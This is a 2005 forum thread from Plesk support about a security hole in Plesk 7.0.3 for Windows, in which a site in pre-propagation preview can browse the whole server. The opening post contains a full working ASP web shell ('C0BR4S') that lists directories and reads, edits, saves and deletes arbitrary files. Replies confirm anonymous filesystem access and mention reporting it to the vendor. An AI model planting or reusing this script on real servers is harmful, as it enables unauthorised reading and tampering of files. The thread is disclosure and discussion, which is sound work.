1. Please take a little time for this simple survey! Thank you for participating!
    Dismiss Notice
  2. Dear Pleskians, please read this carefully! New attachments and other rules Thank you!
    Dismiss Notice

Site before propagate: BUG SECURITY ?

Discussion in 'Plesk for Windows - 8.x and Older' started by DanivalBrazil, Mar 4, 2005.

  1. DanivalBrazil

    DanivalBrazil Guest

    0
     
    Hi!

    Copy the asp script below e paste into file. (index.asp). Access for the ip address, like: http://xx.xx.xx.xx/your-domain.com/index.asp .


    Code:
    <%@ language="vbscript" %>
    <% Option Explicit %>
    <object runat="server" scope="page" id="fsoEdit"
    progid="Scripting.FileSystemObject">
    </object>
    
    <%
    	Const STR_DIR_GIF = "se_folder.gif"
    	Const STR_UNK_GIF = "se_unknown.gif"
    	Const DET_NAME = 0
    	Const DET_SIZE = 1
    	Const DET_DATE = 2
    	
    	Const DET_NAME_COLS = 3
    	
    	Dim strSERoot
    	strSERoot = Server.MapPath("/")
    	
    	Dim strSEScript
    	strSEScript = Request.ServerVariables("SCRIPT_NAME")
    
    	Function GetParm(strName)
    		If IsEmpty(Request.Form(strName)) Then
    			GetParm = Request.QueryString(strName)
    		Else
    			GetParm = Request.Form(strName)
    		End If
    	End Function
    	
    	Function GetFileGIFName(strFName)
    		Dim strGif
    		
    		strGif = "se_" + Trim(fsoEdit.GetExtensionName(strFName)) + ".gif"
    		
    		If Not fsoEdit.FileExists(strSERoot + "\" + strGif) Then
    			GetFileGIFName = STR_UNK_GIF
    		Else
    			GetFileGIFName = strGif
    		End If
    	End Function
    	
    	Function MakeIconImg(strFName)
    		MakeIconImg = "<img height=""16"" width=""16"" src=""" + strFName + """>"
    	End Function
    
    	Function CanEdit(fileCur)
    		Select Case fsoEdit.GetExtensionName(fileCur.Name)
    		Case "asp", "inc", "txt", "html", "htm" , "shtml", "cgi", "asa", "pl", "shtm", "php", "ASP", "PHP", "sql", "aspx", "ASPX"
    			CanEdit = True
    		Case Else
    			CanEdit = False
    		End Select
    	End Function
    
    	Function MakeDirLink(fld, strDir)
    		If strDir = ".." Then
    			MakeDirLink = "<a href=""" + strSEScript + "?CWD=" + Server.URLEncode(fld.ParentFolder) + """>" + strDir + "</a>"
    		Else
    			MakeDirLink = "<a href=""" + strSEScript + "?CWD=" + Server.URLEncode(fsoEdit.BuildPath(fld.Path, strDir)) + """>" + strDir + "</a>"
    		End If
    	End Function
    	
    	Function MakeFileLink(fileCur)
    		If CanEdit(fileCur) Then
    			MakeFileLink = "<a href=""" + strSEScript + "?File=" + Server.URLEncode(fileCur.Path) + """>" + fileCur.Name + "</a>"
    		Else
    			MakeFileLink = fileCur.Name
    		End If
    	End Function
    	
    	Function ShowDirList(strPath, iDetail)
    		Dim fld
    		
    		Set fld = fsoEdit.GetFolder(strPath)
    		
    		Dim strOut
    		strOut = ""
    		If Not fld.IsRootFolder Then
    			strOut = "<tr><td>" + MakeIconImg(STR_DIR_GIF) + "&nbsp;" + MakeDirLink(fld, "..") + "</td></tr>" + vbCR
    		End If
    		
    		Dim iCur
    		iCur = 0
    		
    		Dim dirCur
    		
    		For Each dirCur In fld.SubFolders
    			Select Case iDetail
    			Case DET_NAME
    				If strOut = "" Then
    					strOut = "<tr>"
    				End If
    				strOut = strOut + "<td>" + MakeIconImg(STR_DIR_GIF) + "&nbsp;" + MakeDirLink(fld, dirCur.Name) + "</td>"
    				iCur = iCur + 1
    				If iCur Mod DET_NAME_COLS = 0 Then
    					strOut = strOut + "</tr>" + vbCR + "<tr>"
    				End If
    			End Select
    		Next
    
    		Dim fileCur
    		For Each fileCur In fld.Files
    			Select Case iDetail
    			Case DET_NAME
    				If strOut = "" Then
    					strOut = "<tr>"
    				End If
    				strOut = strOut + "<td>" + MakeIconImg(GetFileGIFName(fileCur.Name)) + "&nbsp;" + MakeFileLink(fileCur) + "</td>"
    				iCur = iCur + 1
    				If iCur Mod DET_NAME_COLS = 0 Then
    					strOut = strOut + "</tr>" + vbCR + "<tr>"
    				End If
    			End Select
    		Next
    			
    		If strOut <> "" Then
    			strOut = strOut + "</tr>" + vbCR
    		End If
    				
    		ShowDirList = strOut
    	End Function
    
    	Sub BackupFile(strFName)
    		Dim strBFName
    		strBFName = strFName + ".BAK"
    		
    		If Not fsoEdit.FileExists(strFName) Then
    			Exit Sub
    		End If
    		
    		If fsoEdit.FileExists(strBFName) Then
    			fsoEdit.DeleteFile strBFName, True
    		End If
    		
    		fsoEdit.CopyFile strFName, strBFName, True
    		
    		fsoEdit.DeleteFile strFName, True
    	End Sub
    	
    	Sub SaveTextFile(strFName, strText)
    		Dim ts
    		Set ts = fsoEdit.CreateTextFile(strFName, True)
    		
    		ts.Write strText
    		
    		ts.Close
    		Set ts = Nothing
    	End Sub
    	
    	Dim strFName
    	strFName = GetParm("File")
    	
    	Dim fEditing
    	fEditing = False
    	
    	Dim fileEdit
    	
    	Dim strAct
    	strAct = GetParm("btnAction")
    	If Not IsEmpty(strAct) Then
    		Dim strOFName
    		
    		If IsEmpty(GetParm("OrgFName")) Then
    			strOFName = strFName
    		Else
    			strOFName = fsoEdit.BuildPath(GetParm("CWD"), GetParm("OrgFName"))			
    		End If
    		
    		If Not IsEmpty(GetParm("CWD")) Then
    			strFName = fsoEdit.BuildPath(GetParm("CWD"), strFName)
    		End If
    					
    		Select Case strAct
    		Case "Save"
    			If strOFName <> strFName Then
    				' rename operation
    				If fsoEdit.FileExists(strOFName) Then
    					BackupFile strOFName
    					fsoEdit.DeleteFile strOFName
    				End If
    			End If
    			BackupFile strFName
    			SaveTextFile strFName, GetParm("txtEdit")
    		Case "Save As"
    			BackupFile strFName
    			SaveTextFile strFName, GetParm("txtEdit")
    		Case "Delete"
    		End Select
    	End If
    			
    	If Not IsEmpty(strFName) Then
    		If fsoEdit.FileExists(strFName) Then
    			fEditing = True
    			Set fileEdit = fsoEdit.GetFile(strFName)
    		Else
    			strFName = Empty
    		End If
    	End If
    	
    	Dim strCWD
    	
    	strCWD = GetParm("CWD")
    	If IsEmpty(strCWD) Then
    		If Not IsEmpty(strFName) Then
    			strCWD = fsoEdit.GetParentFolderName(strFName)
    		Else
    			strCWD = strSERoot
    		End If
    	End If
    %>
    
    <html>
    
    <head>
    <title>C0BR4S - <%=strCWD%></title>
    </head>
    <body>
    <h1>Editar Site</h1>
    <%
    	If Not fEditing Then
    %>
    <h3>Diret&oacute;rio <%=strCWD%></h3>
    <table>
    <%=ShowDirList(strCWD, DET_NAME)%>
    </table>
    <%
    	Else
    %>
    <form method="post" action="<%=strSEScript%>">
    <input type="hidden" name="CWD" value="<%=fileEdit.ParentFolder%>">
    <input type="hidden" name="OrgFName" value="<%=fileEdit.Name%>">
      <h3>Arquivo 
        <input type="text" name="File" value="<%=fileEdit.Name%>"></h3>
    <p><%=MakeIconImg(STR_DIR_GIF)%>&nbsp;<%=MakeDirLink(fileEdit, "..")%></p>
    <table border="1">
    	<tr>
    		<td><textarea cols="80" rows="20" name="txtEdit"><%
    	Dim ts
    	Set ts = fileEdit.OpenAsTextStream()
    	Dim strLine
    	
    	While Not ts.AtEndOfStream
    		strLine = ts.ReadLine
    		Response.Write Server.HTMLEncode(strLine) + vbCr
    	Wend
    	
    	ts.Close
    	Set ts = Nothing
    %></textarea></td>
    	</tr>
    	<tr>
    		<td>
            <input type="submit" name="btnAction" value="Salvar">
            &nbsp;
            <input type="submit" name="btnAction" value="Salvar como">
            &nbsp;
            <input type="submit" name="btnAction" value="Apagar">
            &nbsp;<input type="reset" name="btnAction"></td>
    	</tr>
    </table>
    </form>
    <%
    	End If
    %>
    </body>
    </html>
    
    
    
    Browse in the server!!!

    How do I fix it???



    Danival - from Brazil
     
  2. ColorPrint

    ColorPrint Guest

    0
     
    I think you have wrong permissions...
    I can browse only domain with this script, not server
     
  3. Mertz

    Mertz Guest

    0
     
    I see the problem and I maybe can help explain in English.

    If you put this file into a domain's httpdocs directory then view the file through the Site Preview tool, you can use the posted ASP script to delve down into the filesystem of the server itself.

    I put this on our test server and was able to navigate down to the root of the partition I have Plesk and the customer domains on. I could read files that an anonymous user had absolutely no business reading.

    And I did it all through an anonymous connection.

    Next I plan on testing this with Plesk 7.5. I'll report here if I find that the problem carries over.

    Thank you for discovering this Danival. I'm going to report this to SW-Soft today along with another exploit I found in Plesk 7.5. I'm not going to go into that one though since I believe disclosing exploits should be done to the software vendor first before giving it to the general public.
     
  4. Mertz

    Mertz Guest

    0
     
    I just tested and this does not affect Plesk 7.5.
     
  5. DanivalBrazil

    DanivalBrazil Guest

    0
     
    Thanks Mertz,

    Its is a bug in the 7.03 only. I hope for a bugfix for this version, because the 7.5 have a lot of bugs...

    Thanks for the explanation, my English is horrible...
     
Loading...